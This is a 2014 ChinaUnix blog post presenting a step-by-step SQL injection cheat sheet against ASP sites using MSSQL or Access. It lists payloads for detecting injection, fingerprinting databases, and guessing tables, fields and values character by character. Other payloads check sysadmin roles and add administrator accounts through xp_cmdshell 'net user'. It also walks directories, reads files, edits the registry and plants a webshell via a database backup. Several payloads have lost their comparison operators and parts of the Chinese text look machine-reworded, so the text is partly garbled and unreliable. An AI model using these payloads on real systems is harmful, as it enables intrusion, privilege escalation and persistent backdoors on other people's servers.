Chinaunix首页 | 论坛 | 博客

ekta27177187的ChinaUnix博客

首页 |  博文目录 |  关于我

ekta27177187

  • 博客访问: 575
  • 博文数量: 1
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 20
  • 用 户 组: 普通用户
  • 注册时间: 2013-05-26 19:43
文章分类

全部博文(1)

文章存档

2014年(1)

我的朋友
最近访客
推荐博文
相关博文
全面懂得ASP注入方式

分类: 其他平台

2014-06-06 17:09:07

全面懂得ASP注入方式





1.判断是否有注入
;and 11
;and 12
2.初步断定是否是mssql
;and user 0
3.注入参数是字符
’and .查询条件. and ’’’
4.搜寻时没过滤参数的
’and .查问前提. and ’25’’
5.判断数据库系统
;and (select count(.) from sysobjects) 0 mssql
;and (select count(.) from msysobjects) 0 access
6.猜数据库
;and (Select Count(.) from .数据库名.) 0
7.猜字段
;and (Select Count(字段名) from 数据库名) 0
8.猜字段中记载长度
;and (select top 1 len(字段名) from 数据库名) 0
9.(1)猜字段的ascii值access
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名) 0
(2)猜字段的ascii值mssql
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名) 0
10.测试权限构造mssql
;and 1(SELECT IS_SRVROLEMEMBER(’sysadmin’));
;and 1(SELECT IS_SRVROLEMEMBER(’serveradmin’));
;and 1(SELECT IS_SRVROLEMEMBER(’setupadmin’));
;and 1(SELECT IS_SRVROLEMEMBER(’securityadmin’));
;and 1(SELECT IS_SRVROLEMEMBER(’diskadmin’));
;and 1(SELECT IS_SRVROLEMEMBER(’bulkadmin’));
;and 1(SELECT IS_MEMBER(’db_owner’));
11.增加mssql跟系统的帐户
;exec master.dbo.sp_addlogin username;
;exec master.dbo.sp_password null,username,password;
;exec master.dbo.sp_addsrvrolemember sysadmin username;
;exec master.dbo.xp_cmdshell ’net user username password /workstations:. /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;
;exec master.dbo.xp_cmdshell ’net user username password /add’;
;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ’c:’
;and (select top 1 paths from dirs) 0
;and (select top 1 paths from dirs where paths not in(’上步得到的paths’)) )
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));
;insert temp exec master.dbo.xp_availablemedia; 获切当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ’c:’; 失掉子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:’; 取得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:webindex.asp’; 查看文件的内容
13.mssql中的存储进程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’ 以多个记载集方法返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersion’,’CommonFilesDir’ 返回制订键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表现整型
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersion’,
’TestValueName’,’reg_sz’,’hello’ 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersion’,’TestValueName’ 删除某个值
xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionTestkey’ 删除键,包含该键下所有值
14.mssql的backup创立webshell
use model
create table cmd(str image);
insert into cmd(str) values (’ Dim oScript ’);
backup database model to disk’c:l.asp’;
15.mssql内置函数
;and (select version) 0 获得Windows的版本,
;and user_name()’dbo’ 判定当前系统的连接用户是不是sa
;and (select user_name()) 0 爆当前体系的衔接用户
;and (select db_name()) 0 得到当前连接的数据库

阅读(63) | 评论(0) | 转发(0) |
0

上一篇:没有了

下一篇:没有了

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6